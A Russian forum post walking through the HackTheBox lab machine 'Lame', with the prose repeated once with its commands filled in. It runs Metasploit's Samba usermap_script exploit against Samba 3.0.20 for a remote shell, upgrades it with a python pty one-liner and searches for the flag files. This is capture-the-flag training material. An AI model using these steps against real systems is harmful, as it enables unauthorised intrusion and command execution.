Привет, форумчани! Сегодня решил пройти с вами машину на HackTheBox под названием Lame «Очень старая машина, но одлы вспомнят». Давайте начнем!
Для начала давайте добавим машину в /etc/hosts для удобства.
Теперь нам надо просканировать машину на наличие открытых портов и информацию о них. Для этого пишем:
Теперь мы можем увидеть строку:
Как мы можем видеть это у нас 445 - SMB. Давайте попробуем через searchsploit найти уязвимости в smbd 3.0.20:
Здесь мы увидим Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metas | unix/remote/16320.rb. Если вы решили пройти эту машину через smbclient, то данная уязвимость вам очень понадобиться. Но давайте запустим metasploit:
Теперь давайте напишем search samba и посмотрим что нам покажет msf:
Нам понадобиться exploit/multi/samba/usermap_script. Теперь пишем use exploit/multi/samba/usermap_script
И теперь пишем настройки:
Ну и после этого пишем exploit:
Вот мы и получили шелл. Но давайте заспавним bash
Для этого пишем:
После всех этих действий нам осталось найти флаги. Для этого пишем:
Вот мы и прошли эту не сложную машину. Это моя первая статья так что строго не судите.
Для начала давайте добавим машину в /etc/hosts для удобства.
10.129.126.131 lame.htbТеперь нам надо просканировать машину на наличие открытых портов и информацию о них. Для этого пишем:
Теперь мы можем увидеть строку:
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)Как мы можем видеть это у нас 445 - SMB. Давайте попробуем через searchsploit найти уязвимости в smbd 3.0.20:
searchsploit samba 3.0.20
Здесь мы увидим Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metas | unix/remote/16320.rb. Если вы решили пройти эту машину через smbclient, то данная уязвимость вам очень понадобиться. Но давайте запустим metasploit:
msfconsoleТеперь давайте напишем search samba и посмотрим что нам покажет msf:
Нам понадобиться exploit/multi/samba/usermap_script. Теперь пишем use exploit/multi/samba/usermap_script
И теперь пишем настройки:
Код:
set lhost tun0
set rhost ip-машины
set port 4444
Ну и после этого пишем exploit:
Вот мы и получили шелл. Но давайте заспавним bash
python -c 'import pty;pty.spawn("/bin/bash")'
После всех этих действий нам осталось найти флаги. Для этого пишем:
find . -name user.txt -exec cat {} \;find . -name root.txt -exec cat {} \;Вот мы и прошли эту не сложную машину. Это моя первая статья так что строго не судите.
Последнее редактирование: